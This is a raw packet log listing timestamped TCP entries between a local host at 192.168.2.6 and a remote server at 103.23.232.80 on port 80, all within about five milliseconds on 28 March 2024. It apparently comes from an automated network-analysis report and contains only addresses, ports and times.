                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.203867912 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.203882933 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.203922987 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.203924894 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.203938007 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.203950882 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.203963041 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.203963041 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.203982115 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.203990936 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204030991 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204060078 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204076052 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204087973 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204113007 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204123974 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204138041 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204160929 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204165936 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204174995 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204188108 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204235077 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204238892 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204247952 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204253912 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204277039 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204289913 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204318047 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204359055 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204371929 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204386950 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204400063 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204418898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204435110 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204452038 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204458952 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204468012 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204482079 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204507113 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204521894 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204552889 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204559088 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204574108 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204585075 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204612017 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204632044 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204651117 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204654932 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204669952 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204714060 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204727888 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204750061 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204752922 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204771042 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204781055 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204864979 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204878092 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204890966 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204907894 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204910040 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204943895 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204957008 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204957008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204972982 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.204988956 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205003023 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205017090 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205029964 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205045938 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205048084 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205071926 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205085993 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205095053 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205111027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205125093 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205140114 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205152988 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205183029 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205184937 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205209017 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205221891 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205255985 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205302954 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205316067 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205331087 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205343008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205369949 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205395937 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205410004 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205423117 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205435038 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205440044 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205461025 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205475092 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205490112 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205523968 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205574989 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205590010 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205606937 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205620050 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205629110 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205631971 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205643892 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205679893 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205689907 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205703974 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205717087 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205728054 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205733061 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205760002 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205760956 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205775976 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205816984 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205816984 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205858946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205868006 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205873013 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205888033 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205913067 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205931902 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205935001 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205955982 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.205991030 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206005096 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206017971 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206039906 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206042051 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206053972 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206065893 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206091881 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206104994 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206129074 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206160069 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206161976 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206187963 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206248999 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206263065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206280947 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206288099 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206306934 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206322908 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206352949 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206358910 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206377029 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206389904 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206414938 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206439972 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206454992 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206469059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206484079 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206506014 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206523895 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206538916 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206553936 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206573009 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206604958 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206619978 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206634045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206634998 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206649065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206665993 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206688881 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206691027 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206701994 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206742048 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206756115 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206775904 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206790924 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206799984 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206831932 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206836939 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206846952 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206862926 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206892967 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206908941 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206909895 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206935883 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206971884 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206995010 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.206996918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207017899 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207041979 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207041979 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207056999 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207078934 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207088947 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207123041 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207123995 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207170963 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207185030 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207197905 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207218885 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207223892 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207240105 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207247019 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207266092 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207282066 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207314014 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207329035 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207341909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207372904 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207384109 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207401037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207410097 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207413912 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207427979 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207451105 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207464933 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207477093 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207520962 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207535982 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207557917 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207583904 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207591057 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207617044 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207621098 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207662106 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207663059 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207689047 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207704067 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207756042 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207756042 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207798958 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207799911 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207820892 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207837105 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207851887 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207864046 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207890034 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207901955 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207906008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207921982 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207936049 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207971096 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.207973957 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208028078 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208044052 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208056927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208070040 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208072901 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208095074 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208106995 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208122015 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208134890 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208148956 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208149910 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208173990 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208193064 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208205938 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208228111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208228111 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208256006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208270073 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208270073 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208297968 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208317041 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208326101 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208364010 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208386898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208409071 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208429098 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208437920 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208470106 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208484888 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208498001 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208523035 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208524942 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208550930 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208553076 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208569050 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208595037 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.208606005 CET8049718103.23.232.80192.168.2.6
